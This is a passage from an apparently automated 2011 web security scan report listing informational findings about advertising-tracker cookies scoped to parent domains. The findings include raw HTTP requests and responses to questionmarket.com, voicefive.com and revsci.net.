Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; rsi_segs_1000000=pUP148mheXIQT7uItGF25jD9QihE8IYbNKetsiW8kgFisncWnhVMqxlWq0ucAHjnyThQpuvVI9kMh8n1FZRZG3xOHqJgzQCOjhUe97Ueo/oV8rFkwdsAM2inFD5dxpd+U+E093xPsrix3+OZNio25HCvnvFhZhWthmBTyPD4RapFCIEu2lOw/IIwYkz+6mxP7SBJDiF24gicYCle3d6HY7QZbkm+odQJLW8+PWrecDnI1ZKZHQzsDKye1ebNlG+F0O7KsVRUWc2lZiRsgG+YnEnhhOgUjCqIi4i4q43MBu7CNjxFeYUhxsnubRYFgIe24n3W85w7P/Po0VHFfykAgOVvK83VaDdZKWD/KIVe8dqKzyeln73lCPFzE9HjxKDwsj/BfiMyOXhh1G8dLTLCbJhGOrlytpc84LHyZP+KVwJJNYdAUHQMimUPLIaj2XtIzdmkiZElC6E3vZ7BWA6vfqDqyz/UN2NTNZCl2XEU5yfs8jUdCq/L6cLps1Tz6jEWB3nM03mUZ7lIOmLJZpYScvQJPNi6Qhp+d6GkBErOgH5qxczpWuDAoetyw48xMGgXARtZi/Z7txvmN3uOVuc5NDiDAySPpWWPnSs=; rtc_8DRJ=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRCK="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaqAGPDvxKBGnNieprsaiBOVaX9FhqxzdrX8uPhBCWazG30qABONj4rZSjFRa9hNfi08iU1HDWDdK1nzgrBpcAuaMXzyefC/QKS+ifimajS+SBKYY+0NXbY+HaOBAyp4d6Vh7V4a3HNn57Xp4zGlbiay5EZLelaUYm6atBaSBGzh59PWcDdkx5qqlmsme3+3vR3BqpvIY+kwwFuy5FxcZDPvYPlu84iVYXiKx65uz7IWAWfiofvj7eJKhxVhmmfu1SQ8g/uzydoh/2BoLKQg2yfv9gAPgCERZbvCZouFKMzgcYh4BETbBfW6QqlFzNYbkCGs1ihkoHfZlil7U6FmSK1ep6qyhqsz9SaYT0Z0T6Dvkq4Yh0yx2B80AnmYh4EzGoE3D/V5h6fo2aS++o1IBLVCgJzywj3LuG95eRnmE9aYXVFNUUgDkrqLvNvMnxsv7zDf+CGB1FmQX4ZYdIaAApnF8fUIJEJuGfgpA51ZH95u2mWFbQmspipsXSH/R9ac++5WH5hm4LmLOnLfkR0eZxGZ4IjUiWgT4VBJKabhFp0VLWjZZPYJ1cg0rHJYuDC3x8gOhjAZJz7P22MxqYZICXWCAZnfDncwcbAct/UnFhJH/UMHJcrliDi77SztZn4uMMdyQsiXoHyX90/NAcsQENAESX8SG7+wzT2/+nimVdRU9E4ESP9+UsKNDtshnFXIORLPffo9I1dTN3R0N5f5abcH068cXS4lnwQuppdb3PZJ8cqt5KyeykX+lBRW1PbmT8n89cWzqo2tq2hxqSmLHzMf9dpJ0XXtAqTFptYBp87DY2YMB/ciOkzOgkgOUYLTnpK8HPlG2abZjcqhdLm561D+1AGBAR0kz/CP+gZte2800cXAnayq8cd5r/uaAL6/VSpzRC+cv5IvQOyPwfkaIzBCF7MRJwB9W/O4RBOyMpOpBE6BHuucXn+fiSRPtem82fvTtC6rYAM5Xu5K77cPlbrMgMafQdG4YlF01M9tyoK60dPDWUyqPbkPvP9rk5iG4NZXen36zhKzRzo8Z/tuyMZ"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9HMAYU1O2uQ6agQvHto2eq75IgYszgol7C7yspOc4TfCNog8fILX1SZNuyWxzrk3bzeF6RGNscLYiwwBuw5NglDbetEfHtRcFfcl95ic8yRof2oFa5L4JiQC5IaPGHVkT8GhVZ6xGeKni8NUrqKZmMAbiWsBL5UqdRbeZWToN2eg35zKeZFE02LRKzRNVXYBaa7ppkin1O9btPO6IpX68HbfkWmpxgC4rHlrQY5cih+4vFJ1yVKrNm1UsfyrQhoN1blLBVwvH7W15DdRx7AaRM+ZZsCpxf/q6821H93ulpjwedebCruCq9asXpjc3DnsSQj7rG8huZjfR5xtcyxQahF2J7aH/2RX/uwdJCqIaniRV2csxWeQDj1fYtS3LNaV5ambGum1vzYLMxBPNmdpaPS3YuuEFo4bRMtvsaWX2jD8l0O2uPJqFc1djo5/PC6TG91f37068lORbaSfLef0W9hEk+CLtpU5tIrab1g+Uhul1ETrwsFT0LsMOY7aSo1dto9gzHV1YWhgzvNPEpgmj8e/XkgtE0UFN5RbNm/yynf67Saka70ChSZUc/7F44ZxFTlNqvlId7qFlScwzwQ3zjBt1Evu1Wa6mFZSpnlDXYJaOAhPbK3QTUFPa0ulhL3Cb1rjnWB1w6IsjgXw/W04kH5Txss4xPzgXwcND/0/ZUUgAwA6zXnKWEzvICHdNGxNJB9eZzLjAp+RyLbbm8SG5i04Zm8SEF74RcB42ruBeveVRMto7o9hgrCILt3XYgejpjOHhs49ESuaKo/Mdtc4cvUatGmevM5e5UpVlcekb+gcB4zrxChd/qkCAANSUEUFYnM+n5PkikYD7SR5ekqXY1WLE1QFPGd4RdmUbRCEpKms/T90zg/75Mku6hMWLVEOHJjLsitzKuQPXZnaUKS/zn0v5ea/NbfsTjmjkmMyZ1L5L9gN2SssLQ67MHgZktcYkdXIaxkH/BQUXnj90Y0/dINaOjffbX1j8G4+JNN595YSF8C1OsLkhw7BCyyf7EmjbOGEpQCKRB5qYULcNklZ/1XQV03z4vs7NHKTNfZfWzXxMkzFwyCfZIsGydPLXTwRhsXGYrpq8ACJGAh512uOGHZSQTWSTg4xq8LTJoPrBr4l8PIsYYr6x/pF8KyJL5kcO0E2HqAKcwO1STKii+39WPDkYEafWF4om3Wl+Y4Ky3Hg6xGMXDzrBbaAgKJISziuVyk3GPOaoJUC636sgg3wb2SRVMYepf5bKCD/rosaKat34VF+1hrUCOGJ5iqDruocSVkDTqFKSWJMOJxfNyE3eQoOkxsWQLGzwVCVlHxz1GWhIH4NvpmYjAybIBqGdzob6P8ea5H4lf0I/wPKA/bxPafUtNWX6zmIJIFEP5Tt4xtEmM8clJeiqkQvX3Wb7jV9jBBipcWGFVoA6TT5EKvvRA94UPWVxCYNa6+w7M50HP2s9T2yuy62c/JPJ9GQfvJv00eejh8lPviVx4/wfwB4XMKqmZ91cTdahvWbdmf0Ezw7o034/atITXt+kj"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 1630

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.10. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d887938/3/500004862365/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d887938/3/500004862365/decide.php?ord=1304955586 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:03 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Sun, 09 May 2010 15:40:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1; expires=Fri, 29 Jun 2012 07:40:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-y]y(M-0; expires=Fri, 29-Jun-2012 07:40:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.11. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304955323.101,wait-%3E10000,&1304955323232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

10.12. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25746

